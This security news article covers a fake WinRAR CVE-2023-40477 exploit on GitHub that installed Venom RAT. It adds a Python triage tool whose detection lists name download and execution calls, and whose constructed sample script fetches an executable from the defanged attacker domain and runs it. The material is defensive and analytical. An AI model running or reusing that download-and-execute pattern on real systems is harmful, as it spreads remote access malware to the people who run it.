A malicious actor recently published a fake proof-of-concept (PoC) exploit for a WinRAR vulnerability on GitHub. Anyone who downloaded and ran the code was infected with the Venom RAT malware instead of getting a working exploit.

The fake PoC was adapted from a publicly available PoC script for a SQL injection vulnerability in GeoServer, an open-source geospatial data server. That GeoServer flaw is tracked as CVE-2023-25157 and has nothing to do with WinRAR; the attacker simply reused the script as a plausible-looking shell around the malware download.

According to Palo Alto Networks Unit 42 researcher Robert Falcone, the threat actors may be targeting not only the research community but also other cybercriminals who may be incorporating the latest vulnerabilities into their own attacks.

The GitHub repository, published under the account “whalersplonk”, is currently inaccessible. The PoC was committed on August 21, 2023, four days after the vulnerability was publicly announced.

The WinRAR vulnerability, tracked as CVE-2023-40477, stems from a lack of proper validation of user-supplied data when WinRAR processes recovery volumes, which can result in a memory access past the end of an allocated buffer and could be exploited for remote code execution (RCE) on Windows systems. Exploitation requires user interaction: the victim must open a malicious file. The maintainers addressed the flaw in WinRAR 6.23, together with another vulnerability, CVE-2023-38831, that had already been exploited in the wild.

An analysis of the repository revealed a Python script and a video hosted on Streamable demonstrating how to use the supposed exploit. The Python script contains no exploit at all. Instead, it connects to a remote server (checkblacklistwords[.]eu), fetches an executable named Windows.Gaming.Preview.exe and runs it. That executable is a variant of Venom RAT, a commodity remote access trojan, with capabilities such as listing running processes and receiving commands from a server controlled by the threat actor (94.156.253[.]109).
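The behaviour described above (a "PoC" for a local file-parsing bug that downloads and launches an executable) is something a practitioner can check for statically before ever running a script. The following is an added example, not Unit 42's tooling and not code from the whalersplonk repository: it parses a Python file with the standard library `ast` module, resolves imported names, and reports network fetches, process launches, obfuscation primitives and executable file names. The two sample scripts are constructed for the demo; the defanged hostname and file name from the article appear only as string literals, and the "local PoC" sample writes a junk archive and exploits nothing.

```python
"""Static triage of a downloaded Python "PoC" before running it (added example)."""
import ast
import re

# Calls a genuine exploit for a local archive-parsing bug has no reason to make.
NETWORK_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post", "socket.create_connection",
}
EXEC_CALLS = {
    "os.system", "os.startfile", "os.popen", "subprocess.run",
    "subprocess.Popen", "subprocess.call", "subprocess.check_output",
}
OBFUSCATION_CALLS = {"base64.b64decode", "exec", "eval", "compile", "marshal.loads"}
EXECUTABLE_EXT = re.compile(r"\.(exe|dll|bat|ps1|scr|msi)$", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _import_map(tree):
    """Map each locally bound name to what it was imported as."""
    names = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:          # `import urllib.request` binds `urllib`
                top = a.name.split(".")[0]
                names[a.asname or top] = a.name if a.asname else top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:          # `from os import system as s` binds `s`
                names[a.asname or a.name] = f"{node.module}.{a.name}"
    return names


def triage_script(source: str) -> dict:
    """Collect suspicious calls and string literals from Python source text."""
    tree = ast.parse(source)
    names = _import_map(tree)
    findings = {"network": [], "exec": [], "obfuscation": [], "urls": [], "executables": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if not name:
                continue
            head, _, rest = name.partition(".")
            if head in names:             # resolve aliases back to the real module
                name = names[head] + ("." + rest if rest else "")
            if name in NETWORK_CALLS:
                findings["network"].append(name)
            elif name in EXEC_CALLS:
                findings["exec"].append(name)
            elif name in OBFUSCATION_CALLS:
                findings["obfuscation"].append(name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            findings["urls"].extend(URL_RE.findall(node.value))
            if EXECUTABLE_EXT.search(node.value):
                findings["executables"].append(node.value)
    return findings


def verdict(findings: dict) -> str:
    """Does the script fetch or drop something and then run it?"""
    if findings["exec"] and (findings["network"] or findings["executables"]):
        return "dropper"
    if findings["obfuscation"] or findings["urls"]:
        return "suspicious"
    return "no dropper indicators"


# Constructed sample: mimics the behaviour the article attributes to the fake PoC.
FAKE_POC = '''
import os, urllib.request
url = "http://checkblacklistwords[.]eu/Windows.Gaming.Preview.exe"
out = os.path.join(os.environ["TEMP"], "Windows.Gaming.Preview.exe")
urllib.request.urlretrieve(url, out)
os.startfile(out)
'''

# Constructed sample: what a PoC for a file-format bug usually looks like, a local
# file write and nothing else (this one writes junk and exploits nothing).
LOCAL_POC = r'''
header = b"Rar!\x1a\x07\x01\x00" + b"A" * 64
with open("poc.rar", "wb") as f:
    f.write(header)
'''

if __name__ == "__main__":
    for label, src in (("fake PoC", FAKE_POC), ("local file-format PoC", LOCAL_POC)):
        found = triage_script(src)
        print(f"{label}: {verdict(found)} {found}")
```

The check is deliberately coarse: it flags the download-then-execute pattern, not a specific sample, so an exploit for an unrelated product (such as the GeoServer SQL injection script this lure was built from) would also stand out because it does nothing with RAR files. Anything the triage cannot resolve statically (encoded blobs passed to `exec`, a batch file written to disk) is exactly what to run only inside an isolated, non-networked VM.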

Further investigation of the attack infrastructure revealed that the threat actor registered the checkblacklistwords[.]eu domain at least 10 days before the vulnerability was publicly disclosed. The infrastructure therefore was not built for this particular lure; the actor already had it in place and quickly repurposed it once the WinRAR bug, with its high profile and demand for a working RCE, offered an attractive way to draw in victims.

Palo Alto Networks Unit 42 researcher Robert Falcone stated that an unknown threat actor attempted to compromise individuals by releasing this fake PoC after the vulnerability's public announcement, presenting it as an exploit for an RCE vulnerability in WinRAR, a well-known application. The PoC is fake and does not actually exploit the WinRAR vulnerability, which suggests the actor tried to take advantage of the high demand for a WinRAR RCE to compromise others.

Overall, this incident highlights the need for caution when downloading code or PoCs from untrusted sources, as threat actors use the latest high-profile vulnerabilities as bait to distribute malware. Read a PoC before running it: an exploit for a local archive-parsing bug has no legitimate reason to download and launch an executable from a remote server, and code that does so is a dropper, whatever its README claims. Run unverified PoCs only in an isolated, non-networked virtual machine. The incident also emphasises the importance of promptly patching vulnerabilities and keeping software up to date to mitigate the risk of exploitation; for WinRAR that means updating to version 6.23 or later.
